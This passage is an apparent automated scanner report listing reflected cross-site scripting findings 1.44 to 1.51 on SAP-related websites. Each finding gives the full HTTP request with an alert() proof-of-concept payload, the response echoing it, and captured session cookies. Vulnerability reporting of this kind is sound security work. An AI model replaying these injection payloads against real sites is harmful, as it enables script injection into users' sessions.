1.44. https://sap.webex.com/cmp0306lc/webcomponents/widget/detect.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sap.webex.com
Path:   /cmp0306lc/webcomponents/widget/detect.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ce403<img%20src%3da%20onerror%3dalert(1)>1bedc97d51d was submitted in the REST URL parameter 3. This input was echoed as ce403<img src=a onerror=alert(1)>1bedc97d51d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cmp0306lc/webcomponents/widgetce403<img%20src%3da%20onerror%3dalert(1)>1bedc97d51d/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787

Response

HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:51 GMT
Server: Apache
Set-Cookie: galaxym=R684995909; path=/
Content-Length: 99
Set-Cookie: JSESSIONID=TCKjTQWPxHcpnlV9T8DGQhbgGzDHkxqtmcTZGvQ1G2r0HGj0zfpB!-630472378; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html

Invalid path /webcomponents/widgetce403<img src=a onerror=alert(1)>1bedc97d51d/detect was requested

1.45. https://sap.webex.com/mw0306lc/mywebex/default.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sap.webex.com
Path:   /mw0306lc/mywebex/default.do

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad53a<img%20src%3da%20onerror%3dalert(1)>2f0970f4e1a was submitted in the REST URL parameter 1. This input was echoed as ad53a<img src=a onerror=alert(1)>2f0970f4e1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /mw0306lcad53a<img%20src%3da%20onerror%3dalert(1)>2f0970f4e1a/mywebex/default.do?siteurl=sap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787

Response

HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:29 GMT
Server: Apache
Set-Cookie: galaxym=R3366792236; path=/
Content-Length: 96
Set-Cookie: JSESSIONID=5rpTTQWZ81zgyh7rBRtjtLCwS58nRynhLwb775nnJvrglpnWB1Yl!-1025044524; path=/
Connection: close
Content-Type: text/html

Invalid path /mw0306lcad53a<img src=a onerror=alert(1)>2f0970f4e1a/mywebex/default was requested

1.46. https://sap.webex.com/mw0306lc/mywebex/default.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sap.webex.com
Path:   /mw0306lc/mywebex/default.do

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 132b9<img%20src%3da%20onerror%3dalert(1)>15461ba356 was submitted in the REST URL parameter 2. This input was echoed as 132b9<img src=a onerror=alert(1)>15461ba356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /mw0306lc/mywebex132b9<img%20src%3da%20onerror%3dalert(1)>15461ba356/default.do?siteurl=sap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787

Response

HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:34 GMT
Server: Apache
Set-Cookie: galaxym=R1412479787; path=/
Content-Length: 86
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html

Invalid path /mywebex132b9<img src=a onerror=alert(1)>15461ba356/default was requested

1.47. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 74f21<img%20src%3da%20onerror%3dalert(1)>bfa558bfac9 was submitted in the mbox parameter. This input was echoed as 74f21<img src=a onerror=alert(1)>bfa558bfac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1321211066115-83626&mboxPage=1321211195216-540166&mboxCount=1&mbox=SiteCatalyst%3A%20event74f21<img%20src%3da%20onerror%3dalert(1)>bfa558bfac9&mboxId=0&mboxTime=1321189595427&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1126&browserHeight=1004&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=returning&eVar8=returning&prop9=logN&eVar9=logN&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&prop38=sunday%7C9%3A00pm&eVar38=sunday%7C9%3A00pm&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2FLocale.en_US%2FCurrency.USD%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1321211190550&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/Locale.en_US/Currency.USD?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211190550
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 263
Date: Sun, 13 Nov 2011 19:08:53 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1321211066115-83626.19");mboxFactories.get('default').get('SiteCatalyst: event74f21<img src=a onerror=alert(1)>bfa558bfac9', 0).setOffer(new mboxOfferDefault()).loaded();}

1.48. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 555e1<script>alert(1)</script>fc75ba36069 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1321211066115-83626&mboxPage=1321211195216-540166&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0555e1<script>alert(1)</script>fc75ba36069&mboxTime=1321189595427&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1126&browserHeight=1004&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=returning&eVar8=returning&prop9=logN&eVar9=logN&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&prop38=sunday%7C9%3A00pm&eVar38=sunday%7C9%3A00pm&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2FLocale.en_US%2FCurrency.USD%3Fresid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1321211190550&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/Locale.en_US/Currency.USD?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1321211190550
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 260
Date: Sun, 13 Nov 2011 19:08:55 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1321211066115-83626.19");mboxFactories.get('default').get('SiteCatalyst: event', 0555e1<script>alert(1)</script>fc75ba36069).setOffer(new mboxOfferDefault()).loaded();}

1.49. http://search400.sap.com/ui/ [SAMLResponse parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search400.sap.com
Path:   /ui/

Issue detail

The value of the SAMLResponse request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ca1a5'><script>alert(1)</script>a5ad38de15e was submitted in the SAMLResponse parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /ui/?ssocompatible HTTP/1.1
Host: search400.sap.com
Proxy-Connection: keep-alive
Content-Length: 1140
Cache-Control: max-age=0
Origin: https://search400.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; JSESSIONID=green-wdflbmb6632~98EAED34424DF3688830D6860C994C90; SDNSTATE=2220101804.14596.0000; ouccwmrrwpafp="TAc%2FC2Z7zeqEZb0KPxtVQ1X5V%2FUHC65ooKkITJNgmffQ8snhuLEKc1i6ZsmTUeRXaL%2BNO6w%2FSwIRuDRYWPpad34dRstTpVJJ8UVCCrqhzrLu67FcCDg6RAruW0rw2dabPV2fAoz%2BzARScqZExEMoDfMuDSsIC7cgbAfeVirbdpR1eLdf6H6uyNhIIqJkrl97sUIQTU6iy1WySvSh%2BdtxyflYqcS1go7rV2103XcbVOA%3D"

SAMLResponse=PG5zMzpSZXNwb25zZSBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxMS0xMS0xM1QxOTo0MTo0Mi4wNTFaIiBJblJlc3BvbnNlVG89IlNlMDMzMTllMi0zNWIxLTQwYTAtOTIxNy1jYmFlOGI1Yzg0ZDkiIElEPSJSRVMtU1NPLTU5MzZhYzU
...[SNIP]...
F0dXNDb2RlPjxuczM6U3RhdHVzTWVzc2FnZT5JZGVudGl0eSBQcm92aWRlciBjb3VsZCBub3QgcHJvY2VzcyB0aGUgYXV0aGVudGljYXRpb24gcmVxdWVzdCByZWNlaXZlZC48L25zMzpTdGF0dXNNZXNzYWdlPjwvbnMzOlN0YXR1cz48L25zMzpSZXNwb25zZT4%3Dca1a5'><script>alert(1)</script>a5ad38de15e&saml2post=false&RelayState=ouccwmrrwpafp

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:42:18 GMT
Server: SAP LJS 1.0.0
Content-Type: text/html;charset=UTF-8
Content-Length: 5110
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Login to search400.sap.com</
...[SNIP]...
TdGF0dXNDb2RlPjxuczM6U3RhdHVzTWVzc2FnZT5JZGVudGl0eSBQcm92aWRlciBjb3VsZCBub3QgcHJvY2VzcyB0aGUgYXV0aGVudGljYXRpb24gcmVxdWVzdCByZWNlaXZlZC48L25zMzpTdGF0dXNNZXNzYWdlPjwvbnMzOlN0YXR1cz48L25zMzpSZXNwb25zZT4=ca1a5'><script>alert(1)</script>a5ad38de15e#ssocompatible##RelayState#ouccwmrrwpafp#saml2post#false' />
...[SNIP]...

1.50. https://training.sap.com/us/en/training-locations/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc588<a>a60d8aca665 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /usdc588<a>a60d8aca665/en/training-locations/?noredirect HTTP/1.1
Host: training.sap.com
Connection: keep-alive
Content-Length: 39
Origin: https://training.sap.com
Method: POST https://training.sap.com/us/en/training-locations/?noredirect HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/?noredirect
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd

xajax=registerUser&xajaxr=1321211708182

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:13:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; expires=Mon, 12-Nov-2012 19:13:48 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; expires=Tue, 12-Nov-2013 19:13:48 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=US; expires=Tue, 13-Dec-2011 19:13:48 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Tue, 13-Dec-2011 19:13:48 GMT; path=/; domain=.sap.com
Content-Length: 164
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="js"><![CDATA[document.location.href='/us/en/usdc588<a>a60d8aca665/training-locations?noredirect';]]></cmd></xjx>

1.51. https://training.sap.com/us/en/training-locations/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://training.sap.com
Path:   /us/en/training-locations/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8748c<a>22aed8f2a61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /us/en8748c<a>22aed8f2a61/training-locations/?noredirect HTTP/1.1
Host: training.sap.com
Connection: keep-alive
Content-Length: 39
Origin: https://training.sap.com
Method: POST https://training.sap.com/us/en/training-locations/?noredirect HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://training.sap.com/us/en/training-locations/?noredirect
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
